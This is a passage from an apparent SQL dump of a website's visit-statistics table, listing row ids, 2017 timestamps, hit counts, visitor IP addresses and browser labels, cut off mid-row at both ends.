2.88','other'),(140328,1501667716,1,1,0,0,'91.196.178.71','chrome'),(140329,1501668038,1,1,0,0,'66.249.66.156','chrome'),(140330,1501668051,1,1,0,0,'109.206.56.171','chrome'),(140331,1501668464,1,1,0,0,'91.196.178.68','firefox'),(140332,1501668756,1,1,0,0,'217.182.132.174','other'),(140333,1501668872,1,1,0,0,'91.209.11.236','other'),(140334,1501669011,1,1,0,0,'91.196.178.71','chrome'),(140335,1501669098,1,1,0,0,'213.180.203.42','other'),(140336,1501669207,3,3,0,0,'216.244.66.246','other'),(140337,1501669779,1,1,0,0,'66.249.66.75','chrome'),(140338,1501670441,1,1,0,0,'51.255.65.4','other'),(140339,1501670576,1,1,0,0,'91.196.178.161','chrome'),(140340,1501670643,1,1,0,0,'217.182.132.172','other'),(140341,1501670820,1,1,0,0,'91.209.11.236','other'),(140342,1501670829,1,1,0,0,'92.113.51.222','chrome'),(140343,1501671213,1,1,0,0,'217.182.132.53','other'),(140344,1501671342,1,1,0,0,'51.255.71.119','other'),(140345,1501671528,4,4,0,0,'216.244.66.194','other'),(140346,1501671641,1,1,0,0,'137.74.207.119','other'),(140347,1501671765,1,1,0,0,'216.244.66.246','other'),(140348,1501671786,1,1,0,0,'178.212.101.175','chrome'),(140349,1501671967,1,1,0,0,'217.182.132.30','other'),(140350,1501672812,1,1,0,0,'95.132.2.206','chrome'),(140351,1501673286,1,1,0,0,'5.45.207.56','other'),(140352,1501673334,1,1,0,0,'217.69.133.4','other'),(140353,1501673494,1,1,0,0,'91.196.178.71','chrome'),(140354,1501673908,1,1,0,0,'46.161.9.39','chrome'),(140355,1501674038,28,28,0,0,'91.121.86.136','other'),(140356,1501674220,1,1,0,0,'185.137.18.61','chrome'),(140357,1501674231,1,1,0,0,'66.249.66.155','chrome'),(140358,1501674458,1,1,0,0,'91.196.178.68','firefox'),(140359,1501674589,1,1,0,0,'91.196.178.70','firefox'),(140360,1501674651,1,1,0,0,'128.199.63.237','chrome'),(140361,1501674741,1,1,0,0,'91.196.178.67','chrome'),(140362,1501674834,1,1,0,0,'46.219.2.9','chrome'),(140363,1501674928,1,1,0,0,'8.29.198.26','other'),(140364,1501675280,1,1,0,0,'91.196.178.168','chrome'),(140365,1501675499,1,1,0,0,'194.1.239.244','firefox'),(140366,1501675815,1,0,1,0,'66.249.66.157',''),(140367,1501676188,1,1,0,0,'91.196.178.67','chrome'),(140368,1501676766,1,1,0,0,'37.53.3.145','chrome'),(140369,1501677066,1,1,0,0,'5.188.92.2','chrome'),(140370,1501677509,1,1,0,0,'195.154.168.130','chrome'),(140371,1501678210,1,0,1,0,'66.249.66.155',''),(140372,1501678271,1,1,0,0,'66.102.9.27','chrome'),(140373,1501679151,1,1,0,0,'46.201.175.91','firefox'),(140374,1501679356,1,1,0,0,'216.244.66.246','other'),(140375,1501679909,1,1,0,0,'91.196.178.67','chrome'),(140376,1501680357,6,6,0,0,'216.244.66.246','other'),(140377,1501681068,1,1,0,0,'95.108.181.52','other'),(140378,1501682239,3,3,0,0,'216.244.66.246','other'),(140379,1501682995,1,1,0,0,'217.69.133.4','other'),(140380,1501683535,1,1,0,0,'157.55.39.45','other'),(140381,1501684456,1,1,0,0,'216.244.66.237','other'),(140382,1501684980,1,1,0,0,'195.211.173.159','chrome'),(140383,1501685351,1,0,1,0,'68.180.229.59',''),(140384,1501685649,1,1,0,0,'91.209.11.236','other'),(140385,1501685686,1,1,0,0,'37.9.113.138','other'),(140386,1501685691,1,1,0,0,'37.9.113.78','other'),(140387,1501685773,1,1,0,0,'8.29.198.27','other'),(140388,1501686467,1,1,0,0,'217.69.133.5','other'),(140389,1501686481,1,1,0,0,'217.69.133.203','other'),(140390,1501686542,1,1,0,0,'216.244.66.194','other'),(140391,1501687463,1,1,0,0,'91.196.178.34','chrome'),(140392,1501688784,1,1,0,0,'213.180.203.14','other'),(140393,1501688917,1,1,0,0,'216.244.66.246','other'),(140394,1501689687,1,1,0,0,'5.45.207.57','other'),(140395,1501691492,4,4,0,0,'216.244.66.246','other'),(140396,1501692001,1,1,0,0,'180.76.15.9','other'),(140397,1501692462,1,1,0,0,'91.196.178.166','chrome'),(140398,1501693080,1,0,1,0,'66.249.66.156',''),(140399,1501693112,3,3,0,0,'216.244.66.194','other'),(140400,1501693381,1,0,1,0,'66.249.66.157',''),(140401,1501693471,1,1,0,0,'66.249.66.156','chrome'),(140402,1501693570,2,2,0,0,'157.55.39.205','other'),(140403,1501694404,1,1,0,0,'37.115.109.129','chrome'),(140404,1501694574,1,1,0,0,'91.124.238.177','chrome'),(140405,1501695091,1,1,0,0,'180.76.15.154','other'),(140406,1501695461,1,1,0,0,'66.249.66.155','chrome'),(140407,1501695768,1,1,0,0,'157.55.39.205','other'),(140408,1501695793,1,1,0,0,'37.9.113.66','other'),(140409,1501695802,1,1,0,0,'95.108.181.58','other'),(140410,1501695843,1,1,0,0,'66.249.66.156','chrome'),(140411,1501696399,1,1,0,0,'37.73.255.66','chrome'),(140412,1501696483,1,1,0,0,'51.255.65.50','other'),(140413,1501696594,1,1,0,0,'178.154.171.18','other'),(140414,1501696604,1,1,0,0,'8.29.198.25','other'),(140415,1501696711,1,1,0,0,'217.182.132.96','other'),(140416,1501696875,1,1,0,0,'51.255.65.25','other'),(140417,1501697263,1,1,0,0,'5.45.207.83','other'),(140418,1501697808,1,1,0,0,'51.255.65.52','other'),(140419,1501697954,1,1,0,0,'95.108.181.57','other'),(140420,1501698236,1,1,0,0,'51.255.65.88','other'),(140421,1501698297,1,1,0,0,'66.249.66.156','chrome'),(140422,1501698763,1,1,0,0,'178.154.171.45','other'),(140423,1501699165,1,0,1,0,'66.249.66.75',''),(140424,1501699192,1,1,0,0,'37.115.109.129','chrome'),(140425,1501699476,1,1,0,0,'216.244.66.246','other'),(140426,1501699612,1,1,0,0,'217.69.133.9','other'),(140427,1501699963,1,1,0,0,'66.249.66.155','chrome'),(140428,1501700664,1,1,0,0,'37.9.113.66','other'),(140429,1501700853,1,1,0,0,'95.108.181.60','other'),(140430,1501700876,1,1,0,0,'217.182.132.190','other'),(140431,1501701059,1,1,0,0,'5.45.207.64','other'),(140432,1501701346,1,1,0,0,'95.108.181.69','other'),(140433,1501701415,1,1,0,0,'51.255.71.118','other'),(140434,1501702036,2,2,0,0,'216.244.66.246','other'),(140435,1501702423,1,1,0,0,'37.144.50.31','msie'),(140436,1501702439,1,1,0,0,'195.154.168.130','chrome'),(140437,1501702548,2,2,0,0,'5.45.207.56','other'),(140438,1501703046,1,1,0,0,'51.255.65.57','other'),(140439,1501703238,1,1,0,0,'137.74.207.164','other'),(140440,1501703471,1,1,0,0,'66.249.66.155','chrome'),(140441,1501703541,3,3,0,0,'216.244.66.194','other'),(140442,1501703739,1,1,0,0,'217.182.132.151','other'),(140443,1501704117,5,5,0,0,'216.244.66.246','other'),(140444,1501704849,1,1,0,0,'217.182.132.22','other'),(140445,1501705715,1,1,0,0,'51.255.71.100','other'),(140446,1501705776,1,1,0,0,'178.154.171.53','other'),(140447,1501705780,1,1,0,0,'213.180.203.43','other'),(140448,1501705926,1,1,0,0,'213.180.203.25','other'),(140449,1501706602,1,0,1,0,'66.249.66.155',''),(140450,1501706613,1,1,0,0,'66.249.66.155','chrome'),(140451,1501706627,1,1,0,0,'66.249.66.75','chrome'),(140452,1501706997,9,9,0,0,'216.244.66.194','other'),(140453,1501707078,1,1,0,0,'51.255.65.18','other'),(140454,1501707442,1,1,0,0,'8.29.198.25','other'),(140455,1501707761,1,0,1,0,'66.249.66.157',''),(140456,1501707836,1,1,0,0,'51.255.65.90','other'),(140457,1501708030,1,1,0,0,'164.132.162.155','other'),(140458,1501708212,1,1,0,0,'178.154.171.45','other'),(140459,1501708979,1,1,0,0,'157.55.39.45','other'),(140460,1501709213,1,1,0,0,'213.180.203.25','other'),(140461,1501709292,1,1,0,0,'51.255.65.90','other'),(140462,1501709467,1,1,0,0,'216.244.66.237','other'),(140463,1501709829,2,1,1,0,'66.249.66.156',''),(140464,1501709876,1,1,0,0,'81.1.242.33','other'),(140465,1501710038,1,1,0,0,'37.9.113.58','other'),(140466,1501710111,1,0,1,0,'66.249.66.155',''),(140467,1501710179,1,1,0,0,'217.182.132.24','other'),(140468,1501710191,1,1,0,0,'51.255.65.56','other'),(140469,1501710458,1,1,0,0,'217.182.132.56','other'),(140470,1501710669,1,1,0,0,'95.108.181.57','other'),(140471,1501710891,1,1,0,0,'51.255.65.43','other'),(140472,1501710943,3,3,0,0,'216.244.66.194','other'),(140473,1501711144,1,1,0,0,'46.50.129.43','firefox'),(140474,1501711252,1,1,0,0,'217.182.132.87','other'),(140475,1501711644,1,1,0,0,'51.255.65.26','other'),(140476,1501711886,1,1,0,0,'51.255.65.57','other'),(140477,1501712096,1,0,1,0,'68.180.229.59',''),(140478,1501712176,1,0,1,0,'66.249.66.157',''),(140479,1501712859,1,1,0,0,'217.182.132.57','other'),(140480,1501712941,4,4,0,0,'216.244.66.246','other'),(140481,1501712944,1,1,0,0,'91.209.11.236','other'),(140482,1501713268,1,1,0,0,'217.182.132.58','other'),(140483,1501713338,1,1,0,0,'217.182.132.56','other'),(140484,1501714112,1,1,0,0,'51.255.65.67','other'),(140485,1501714113,1,1,0,0,'164.132.164.180','other'),(140486,1501714134,1,1,0,0,'213.180.203.18','other'),(140487,1501714152,1,1,0,0,'51.255.71.114','other'),(140488,1501714616,8,8,0,0,'82.193.102.149','other'),(140489,1501714687,1,1,0,0,'35.184.189.105','other'),(140490,1501714705,1,1,0,0,'66.249.66.157','chrome'),(140491,1501715001,4,4,0,0,'216.244.66.246','other'),(140492,1501715107,1,1,0,0,'51.255.65.81','other'),(140493,1501715360,1,1,0,0,'217.182.132.61','other'),(140494,1501715451,1,1,0,0,'51.255.65.4','other'),(140495,1501715561,1,1,0,0,'5.45.207.56','other'),(140496,1501715575,1,1,0,0,'217.182.132.182','other'),(140497,1501715598,1,1,0,0,'217.182.132.180','other'),(140498,1501715614,1,1,0,0,'91.209.11.236','other'),(140499,1501716448,1,1,0,0,'51.255.65.31','other'),(140500,1501716457,2,1,1,0,'66.249.66.155',''),(140501,1501716606,1,1,0,0,'178.154.171.59','other'),(140502,1501716625,1,0,1,0,'66.249.66.74',''),(140503,1501716779,1,0,1,0,'66.249.66.156',''),(140504,1501716801,1,1,0,0,'217.182.132.4','other'),(140505,1501716920,1,1,0,0,'217.182.132.64','other'),(140506,1501716956,1,1,0,0,'51.255.71.114','other'),(140507,1501717561,1,1,0,0,'51.255.65.50','other'),(140508,1501717631,1,1,0,0,'217.182.132.188','other'),(140509,1501717850,1,1,0,0,'5.45.207.56','other'),(140510,1501718158,3,3,0,0,'216.244.66.194','other'),(140511,1501718266,1,1,0,0,'217.182.132.33','other'),(140512,1501718296,1,1,0,0,'8.29.198.26','other'),(140513,1501718319,1,1,0,0,'164.132.162.157','other'),(140514,1501718592,1,1,0,0,'178.154.171.53','other'),(140515,1501718822,1,0,1,0,'66.249.66.156',''),(140516,1501718889,1,1,0,0,'157.55.39.153','other'),(140517,1501719004,1,1,0,0,'213.180.203.32','other'),(140518,1501719035,1,1,0,0,'217.182.132.171','other'),(140519,1501719057,1,0,1,0,'66.249.66.155',''),(140520,1501719911,1,1,0,0,'5.45.207.56','other'),(140521,1501719931,1,1,0,0,'51.255.65.61','other'),(140522,1501720003,1,1,0,0,'66.249.66.157','chrome'),(140523,1501720187,1,1,0,0,'137.74.201.100','other'),(140524,1501720294,1,1,0,0,'51.255.65.18','other'),(140525,1501720312,1,1,0,0,'66.249.66.74','chrome'),(140526,1501720348,1,1,0,0,'91.209.11.236','other'),(140527,1501720478,1,1,0,0,'217.182.132.147','other'),(140528,1501721290,1,1,0,0,'217.182.132.27','other'),(140529,1501721387,1,1,0,0,'51.255.65.44','other'),(140530,1501721688,1,1,0,0,'178.154.171.18','other'),(140531,1501721892,1,1,0,0,'217.69.133.4','other'),(140532,1501722000,1,1,0,0,'91.209.11.236','other'),(140533,1501722162,4,4,0,0,'216.244.66.246','other'),(140534,1501722362,1,1,0,0,'51.255.71.123','other'),(140535,1501722538,1,1,0,0,'157.55.39.153','other'),(140536,1501722953,1,1,0,0,'137.74.207.161','other'),(140537,1501723057,1,1,0,0,'217.182.132.155','other'),(140538,1501723073,1,1,0,0,'128.68.217.67','msie'),(140539,1501723315,1,1,0,0,'217.182.132.81','other'),(140540,1501723656,1,1,0,0,'216.244.66.194','other'),(140541,1501723750,1,1,0,0,'5.45.207.57','other'),(140542,1501724233,6,6,0,0,'216.244.66.246','other'),(140543,1501724711,1,1,0,0,'66.102.9.29','chrome'),(140544,1501724847,1,1,0,0,'137.74.207.164','other'),(140545,1501725943,1,1,0,0,'217.182.132.177','other'),(140546,1501726038,1,1,0,0,'137.74.207.114','other'),(140547,1501726228,1,1,0,0,'178.154.171.3','other'),(140548,1501726355,1,1,0,0,'66.249.66.75','chrome'),(140549,1501726870,3,3,0,0,'216.244.66.194','other'),(140550,1501727113,1,1,0,0,'137.74.207.159','other'),(140551,1501727126,1,1,0,0,'51.255.65.62','other'),(140552,1501727621,1,1,0,0,'91.209.11.236','other'),(140553,1501727750,1,1,0,0,'51.255.71.126','other'),(140554,1501727937,1,1,0,0,'137.74.207.102','other'),(140555,1501728590,1,1,0,0,'213.180.203.32','other'),(140556,1501728632,1,1,0,0,'213.180.203.43','other'),(140557,1501728843,1,1,0,0,'51.255.71.130','other'),(140558,1501728985,1,1,0,0,'157.55.39.45','other'),(140559,1501729131,1,1,0,0,'8.29.198.27','other'),(140560,1501729956,5,5,0,0,'216.244.66.194','other'),(140561,1501730701,1,1,0,0,'217.182.132.56','other'),(140562,1501730948,1,1,0,0,'213.180.203.32','other'),(140563,1501731220,1,1,0,0,'37.9.113.66','other'),(140564,1501731607,1,1,0,0,'217.182.132.21','other'),(140565,1501731671,1,1,0,0,'217.182.132.175','other'),(140566,1501731690,1,1,0,0,'95.108.181.69','other'),(140567,1501731786,1,1,0,0,'178.154.171.18','other'),(140568,1501732054,1,1,0,0,'207.46.13.109','other'),(140569,1501732481,1,1,0,0,'51.255.65.22','other'),(140570,1501732749,1,1,0,0,'37.9.113.66','other'),(140571,1501732813,1,1,0,0,'95.108.181.60','other'),(140572,1501732859,1,1,0,0,'217.182.132.74','other'),(140573,1501732877,1,1,0,0,'213.180.203.32','other'),(140574,1501732878,1,1,0,0,'164.132.162.158','other'),(140575,1501733194,4,4,0,0,'216.244.66.246','other'),(140576,1501733257,1,1,0,0,'213.180.203.42','other'),(140577,1501733440,1,1,0,0,'5.45.207.83','other'),(140578,1501733550,1,1,0,0,'178.154.171.42','other'),(140579,1501733596,1,1,0,0,'217.182.132.5','other'),(140580,1501733640,1,1,0,0,'95.108.181.57','other'),(140581,1501733658,1,1,0,0,'207.46.13.109','other'),(140582,1501734936,1,0,1,0,'66.249.66.74',''),(140583,1501735324,6,6,0,0,'216.244.66.246','other'),(140584,1501735500,1,1,0,0,'91.196.178.72','firefox'),(140585,1501737074,1,1,0,0,'66.249.66.74','chrome'),(140586,1501737376,1,1,0,0,'95.108.181.58','other'),(140587,1501737541,11,11,0,0,'216.244.66.194','other'),(140588,1501738055,1,1,0,0,'213.180.203.43','other'),(140589,1501738122,1,1,0,0,'91.196.178.67','chrome'),(140590,1501738748,1,1,0,0,'180.76.15.152','other'),(140591,1501739049,1,1,0,0,'91.196.178.67','chrome'),(140592,1501739232,1,1,0,0,'66.249.66.155','chrome'),(140593,1501739234,1,1,0,0,'213.180.203.25','other'),(140594,1501739953,1,1,0,0,'217.69.133.2','other'),(140595,1501739972,1,1,0,0,'8.29.198.26','other'),(140596,1501740385,1,1,0,0,'51.255.65.87','other'),(140597,1501740464,1,1,0,0,'178.154.171.59','other'),(140598,1501740502,1,1,0,0,'37.55.58.36','chrome'),(140599,1501740539,1,1,0,0,'5.45.207.64','other'),(140600,1501740763,1,1,0,0,'178.154.171.53','other'),(140601,1501740860,1,1,0,0,'91.196.178.70','firefox'),(140602,1501741157,1,1,0,0,'91.196.178.67','chrome'),(140603,1501741547,1,1,0,0,'137.74.207.119','other'),(140604,1501741570,1,1,0,0,'37.55.58.36','chrome'),(140605,1501741762,1,0,1,0,'68.180.229.59',''),(140606,1501742019,1,1,0,0,'137.74.207.109','other'),(140607,1501742042,1,1,0,0,'51.255.65.45','other'),(140608,1501742162,1,1,0,0,'217.69.133.2','other'),(140609,1501742465,1,1,0,0,'93.74.212.147','firefox'),(140610,1501742559,1,1,0,0,'46.201.175.91','firefox'),(140611,1501743024,1,1,0,0,'37.9.113.94','other'),(140612,1501743206,1,1,0,0,'178.154.171.42','other'),(140613,1501743378,1,1,0,0,'91.196.178.163','chrome'),(140614,1501743619,3,3,0,0,'216.244.66.246','other'),(140615,1501744072,1,1,0,0,'188.166.81.36','chrome'),(140616,1501744276,1,1,0,0,'185.137.18.244','chrome'),(140617,1501744453,1,0,1,0,'66.249.66.74',''),(140618,1501744530,1,1,0,0,'216.244.66.246','other'),(140619,1501744669,1,1,0,0,'217.182.132.171','other'),(140620,1501744758,3,3,0,0,'216.244.66.194','other'),(140621,1501745378,1,1,0,0,'217.182.132.173','other'),(140622,1501745546,1,1,0,0,'217.69.133.2','other'),(140623,1501745549,1,1,0,0,'217.69.133.4','other'),(140624,1501745592,1,1,0,0,'51.255.65.42','other'),(140625,1501745699,1,1,0,0,'217.182.132.191','other'),(140626,1501746020,1,1,0,0,'51.255.71.131','other'),(140627,1501746060,1,1,0,0,'178.154.171.45','other'),(140628,1501746327,1,1,0,0,'91.196.178.169','chrome'),(140629,1501746378,1,1,0,0,'66.249.66.74','chrome'),(140630,1501746384,1,1,0,0,'66.249.66.156','chrome'),(140631,1501746454,1,1,0,0,'91.196.178.67','firefox'),(140632,1501746492,1,1,0,0,'137.74.207.188','other'),(140633,1501747002,1,1,0,0,'137.74.207.110','other'),(140634,1501747220,1,1,0,0,'91.196.178.70','firefox'),(140635,1501747350,1,1,0,0,'207.46.13.109','other'),(140636,1501747507,1,1,0,0,'91.196.178.67','chrome'),(140637,1501747544,1,1,0,0,'51.255.65.6','other'),(140638,1501747607,1,1,0,0,'51.255.65.32','other'),(140639,1501747631,1,1,0,0,'217.182.132.93','other'),(140640,1501747707,1,1,0,0,'213.180.203.18','other'),(140641,1501747709,1,1,0,0,'217.69.133.5','other'),(140642,1501747978,1,1,0,0,'95.132.43.84','chrome'),(140643,1501748017,1,1,0,0,'137.74.201.100','other'),(140644,1501748086,1,1,0,0,'95.108.181.60','other'),(140645,1501748440,1,1,0,0,'91.196.178.67','chrome'),(140646,1501748505,1,1,0,0,'51.255.71.113','other'),(140647,1501748518,1,1,0,0,'217.182.132.180','other'),(140648,1501748784,1,1,0,0,'95.108.181.57','other'),(140649,1501748863,1,1,0,0,'51.255.71.116','other'),(140650,1501748872,1,1,0,0,'66.249.66.157','chrome'),(140651,1501748964,1,1,0,0,'217.182.132.56','other'),(140652,1501748990,1,1,0,0,'37.55.58.36','chrome'),(140653,1501749738,1,0,1,0,'66.249.66.74',''),(140654,1501749748,1,1,0,0,'217.182.132.152','other'),(140655,1501749844,1,1,0,0,'51.255.71.116','other'),(140656,1501750175,1,1,0,0,'91.196.178.164','chrome'),(140657,1501750201,1,1,0,0,'66.249.66.76','chrome'),(140658,1501750288,1,1,0,0,'66.249.66.157','chrome'),(140659,1501750451,1,1,0,0,'91.196.178.67','chrome'),(140660,1501750500,1,1,0,0,'66.249.66.156','chrome'),(140661,1501750615,1,1,0,0,'217.182.132.71','other'),(140662,1501750686,1,1,0,0,'213.180.203.43','other'),(140663,1501750815,1,1,0,0,'51.255.65.63','other'),(140664,1501750818,1,1,0,0,'8.29.198.25','other'),(140665,1501750955,1,1,0,0,'217.182.132.175','other'),(140666,1501751203,1,1,0,0,'5.45.207.83','other'),(140667,1501751352,1,1,0,0,'217.182.132.53','other'),(140668,1501751366,3,3,0,0,'216.244.66.246','other'),(140669,1501751512,1,1,0,0,'51.255.65.42','other'),(140670,1501751601,1,1,0,0,'51.255.65.81','other'),(140671,1501751933,2,2,0,0,'195.211.173.159','chrome'),(140672,1501751958,1,0,1,0,'66.249.66.76',''),(140673,1501752083,1,1,0,0,'51.255.65.44','other'),(140674,1501752613,1,1,0,0,'51.255.65.65','other'),(140675,1501752709,1,1,0,0,'173.208.173.138','other'),(140676,1501752960,2,2,0,0,'95.132.14.58','chrome'),(140677,1501753004,1,1,0,0,'46.201.175.91','firefox'),(140678,1501753078,1,1,0,0,'137.74.207.164','other'),(140679,1501753110,1,1,0,0,'217.182.132.97','other'),(140680,1501753120,1,1,0,0,'51.255.71.129','other'),(140681,1501753223,1,1,0,0,'91.196.178.67','chrome'),(140682,1501753269,1,1,0,0,'217.182.132.171','other'),(140683,1501753282,2,2,0,0,'217.69.133.6','other'),(140684,1501753323,1,1,0,0,'46.188.81.53','msie'),(140685,1501753348,1,1,0,0,'51.255.71.112','other'),(140686,1501753567,1,1,0,0,'95.220.199.133','msie'),(140687,1501753998,1,1,0,0,'217.182.132.86','other'),(140688,1501754081,1,1,0,0,'217.182.132.175','other'),(140689,1501754326,1,1,0,0,'5.45.207.56','other'),(140690,1501754393,3,3,0,0,'216.244.66.246','other'),(140691,1501754397,1,1,0,0,'66.249.66.155','chrome'),(140692,1501754405,1,1,0,0,'217.182.132.94','other'),(140693,1501754663,1,1,0,0,'91.196.178.98','chrome'),(140694,1501754695,11,11,0,0,'95.91.11.244','other'),(140695,1501754944,1,1,0,0,'217.182.132.69','other'),(140696,1501755091,1,0,1,0,'66.249.66.75',''),(140697,1501755397,1,1,0,0,'217.182.132.147','other'),(140698,1501755598,1,1,0,0,'216.244.66.194','other'),(140699,1501755805,1,1,0,0,'51.255.65.30','other'),(140700,1501755850,1,1,0,0,'66.249.66.156','chrome'),(140701,1501756980,1,1,0,0,'51.255.65.85','other'),(140702,1501757109,1,1,0,0,'217.182.132.22','other'),(140703,1501757349,1,1,0,0,'151.80.27.116','other'),(140704,1501757972,1,1,0,0,'5.45.207.64','other'),(140705,1501758099,1,1,0,0,'37.9.113.78','other'),(140706,1501758277,1,1,0,0,'51.255.65.40','other'),(140707,1501758608,1,1,0,0,'66.249.66.157','chrome'),(140708,1501758610,1,1,0,0,'66.249.66.75','chrome'),(140709,1501758623,1,1,0,0,'51.255.65.19','other'),(140710,1501759175,1,1,0,0,'137.74.207.119','other'),(140711,1501759413,1,1,0,0,'107.167.108.151','opera'),(140712,1501759570,2,2,0,0,'216.244.66.194','other'),(140713,1501759658,1,1,0,0,'217.182.132.70','other'),(140714,1501759680,3,3,0,0,'216.244.66.246','other'),(140715,1501759688,1,1,0,0,'217.182.132.186','other'),(140716,1501759886,1,1,0,0,'51.255.65.77','other'),(140717,1501759975,1,1,0,0,'51.255.65.42','other'),(140718,1501760008,1,1,0,0,'217.182.132.20','other'),(140719,1501760153,1,1,0,0,'95.28.172.46','msie'),(140720,1501760191,1,1,0,0,'217.182.132.55','other'),(140721,1501760658,1,1,0,0,'91.196.178.67','chrome'),(140722,1501760870,1,1,0,0,'217.182.132.35','other'),(140723,1501761619,1,1,0,0,'66.249.66.76','chrome'),(140724,1501761663,1,1,0,0,'8.29.198.25','other'),(140725,1501761752,3,3,0,0,'216.244.66.246','other'),(140726,1501761821,1,1,0,0,'51.255.65.77','other'),(140727,1501762079,1,1,0,0,'82.144.213.78','firefox'),(140728,1501762304,1,1,0,0,'217.182.132.176','other'),(140729,1501762385,1,1,0,0,'213.180.203.42','other'),(140730,1501762817,1,1,0,0,'164.132.162.157','other'),(140731,1501762908,1,1,0,0,'213.180.203.25','other'),(140732,1501762920,1,1,0,0,'216.244.66.194','other'),(140733,1501763005,1,1,0,0,'37.9.113.94','other'),(140734,1501763148,1,1,0,0,'51.255.71.126','other'),(140735,1501763174,1,1,0,0,'91.196.178.67','chrome'),(140736,1501763194,1,1,0,0,'5.45.207.57','other'),(140737,1501763218,1,1,0,0,'66.249.66.74','chrome'),(140738,1501763378,1,1,0,0,'37.204.68.12','msie'),(140739,1501763846,2,2,0,0,'66.249.66.156','chrome'),(140740,1501763885,1,1,0,0,'66.249.66.157','chrome'),(140741,1501764172,1,1,0,0,'213.180.203.21','other'),(140742,1501764270,1,1,0,0,'37.54.56.9','chrome'),(140743,1501764281,1,1,0,0,'213.180.203.42','other'),(140744,1501764322,1,1,0,0,'213.180.203.32','other'),(140745,1501764500,1,1,0,0,'213.108.45.138','chrome'),(140746,1501764518,1,1,0,0,'46.188.81.53','msie'),(140747,1501764679,1,1,0,0,'51.255.71.132','other'),(140748,1501764686,1,1,0,0,'95.220.199.133','msie'),(140749,1501764903,1,1,0,0,'91.196.178.70','firefox'),(140750,1501765003,1,1,0,0,'51.255.71.115','other'),(140751,1501765135,1,1,0,0,'217.182.132.191','other'),(140752,1501765148,1,1,0,0,'95.108.181.52','other'),(140753,1501765355,1,1,0,0,'5.45.207.66','other'),(140754,1501765563,1,1,0,0,'91.237.107.17','chrome'),(140755,1501765893,1,0,1,0,'66.249.66.74',''),(140756,1501765933,1,1,0,0,'91.196.178.70','firefox'),(140757,1501766195,1,1,0,0,'178.154.171.3','other'),(140758,1501766238,1,1,0,0,'216.244.66.246','other'),(140759,1501766255,1,1,0,0,'37.9.113.78','other'),(140760,1501766430,1,1,0,0,'217.182.132.187','other'),(140761,1501766574,1,1,0,0,'37.9.113.66','other'),(140762,1501766628,1,1,0,0,'37.9.113.128','other'),(140763,1501766895,2,2,0,0,'216.244.66.194','other'),(140764,1501767436,1,1,0,0,'51.255.65.224','other'),(140765,1501767609,1,1,0,0,'217.182.132.148','other'),(140766,1501767813,1,1,0,0,'66.249.66.155','chrome'),(140767,1501767820,1,1,0,0,'66.249.66.75','chrome'),(140768,1501767821,1,1,0,0,'217.182.132.152','other'),(140769,1501767889,1,1,0,0,'185.76.10.66','chrome'),(140770,1501767921,1,1,0,0,'37.9.113.138','other'),(140771,1501767933,1,1,0,0,'51.255.65.54','other'),(140772,1501768208,1,1,0,0,'95.108.181.60','other'),(140773,1501768329,1,1,0,0,'164.132.162.188','other'),(140774,1501768614,1,1,0,0,'37.9.113.78','other'),(140775,1501769088,1,1,0,0,'188.166.81.36','chrome'),(140776,1501769091,1,1,0,0,'216.244.66.194','other'),(140777,1501769101,1,1,0,0,'91.196.178.70','firefox'),(140778,1501769144,1,1,0,0,'176.37.33.161','chrome'),(140779,1501769820,3,3,0,0,'216.244.66.246','other'),(140780,1501770176,1,1,0,0,'37.9.113.66','other'),(140781,1501770190,1,1,0,0,'5.45.207.83','other'),(140782,1501770269,1,1,0,0,'91.196.178.39','chrome'),(140783,1501770856,1,1,0,0,'217.182.132.147','other'),(140784,1501770862,1,0,1,0,'68.180.229.59',''),(140785,1501770889,1,1,0,0,'51.255.65.13','other'),(140786,1501771137,2,2,0,0,'216.244.66.246','other'),(140787,1501771276,1,1,0,0,'213.180.203.42','other'),(140788,1501771324,1,1,0,0,'188.32.176.228','msie'),(140789,1501771409,1,1,0,0,'51.255.71.123','other'),(140790,1501771421,1,1,0,0,'217.182.132.192','other'),(140791,1501771560,1,1,0,0,'51.255.71.116','other'),(140792,1501771861,1,1,0,0,'5.164.69.165','msie'),(140793,1501772507,1,1,0,0,'8.29.198.27','other'),(140794,1501772529,8,8,0,0,'216.244.66.194','other'),(140795,1501772648,1,1,0,0,'137.74.207.120','other'),(140796,1501772837,1,1,0,0,'217.182.132.76','other'),(140797,1501772892,1,1,0,0,'51.255.65.43','other'),(140798,1501772987,1,1,0,0,'217.182.132.14','other'),(140799,1501773012,1,0,1,0,'66.249.66.157',''),(140800,1501773091,1,1,0,0,'46.148.228.88','msie'),(140801,1501773218,1,1,0,0,'109.63.156.168','msie'),(140802,1501774968,1,1,0,0,'95.24.142.25','msie'),(140803,1501775187,1,1,0,0,'217.182.132.191','other'),(140804,1501775492,1,1,0,0,'216.244.66.246','other'),(140805,1501775709,1,1,0,0,'185.4.41.56','chrome'),(140806,1501775963,1,1,0,0,'51.255.65.11','other'),(140807,1501776156,1,1,0,0,'137.74.201.100','other'),(140808,1501776353,1,1,0,0,'216.244.66.194','other'),(140809,1501776696,1,1,0,0,'66.249.66.155','chrome'),(140810,1501776705,1,1,0,0,'66.249.66.74','chrome'),(140811,1501777162,1,1,0,0,'66.249.66.75','chrome'),(140812,1501777338,1,1,0,0,'91.196.178.168','chrome'),(140813,1501777551,4,4,0,0,'216.244.66.194','other'),(140814,1501777590,1,1,0,0,'217.69.133.194','other'),(140815,1501777973,1,1,0,0,'137.74.203.194','other'),(140816,1501778002,1,1,0,0,'217.182.132.30','other'),(140817,1501778354,1,1,0,0,'185.4.41.56','chrome'),(140818,1501778499,1,1,0,0,'157.55.39.205','other'),(140819,1501778727,1,1,0,0,'137.74.207.108','other'),(140820,1501779004,1,1,0,0,'217.69.133.6','other'),(140821,1501779040,4,4,0,0,'216.244.66.246','other'),(140822,1501779118,1,1,0,0,'91.196.178.98','chrome'),(140823,1501779355,1,1,0,0,'91.196.178.70','firefox'),(140824,1501779637,2,2,0,0,'91.209.11.236','other'),(140825,1501779821,8,8,0,0,'216.244.66.194','other'),(140826,1501780008,1,1,0,0,'51.255.71.132','other'),(140827,1501780173,1,1,0,0,'37.204.202.132','msie'),(140828,1501780496,1,1,0,0,'91.196.178.39','chrome'),(140829,1501780579,1,1,0,0,'217.182.132.147','other'),(140830,1501781053,1,1,0,0,'217.182.132.21','other'),(140831,1501781598,1,1,0,0,'5.164.69.165','msie'),(140832,1501782036,1,1,0,0,'51.255.65.78','other'),(140833,1501782114,1,1,0,0,'37.147.97.20','msie'),(140834,1501782153,1,0,1,0,'66.249.66.75',''),(140835,1501782208,1,1,0,0,'109.63.140.99','msie'),(140836,1501782533,1,1,0,0,'217.182.132.19','other'),(140837,1501782537,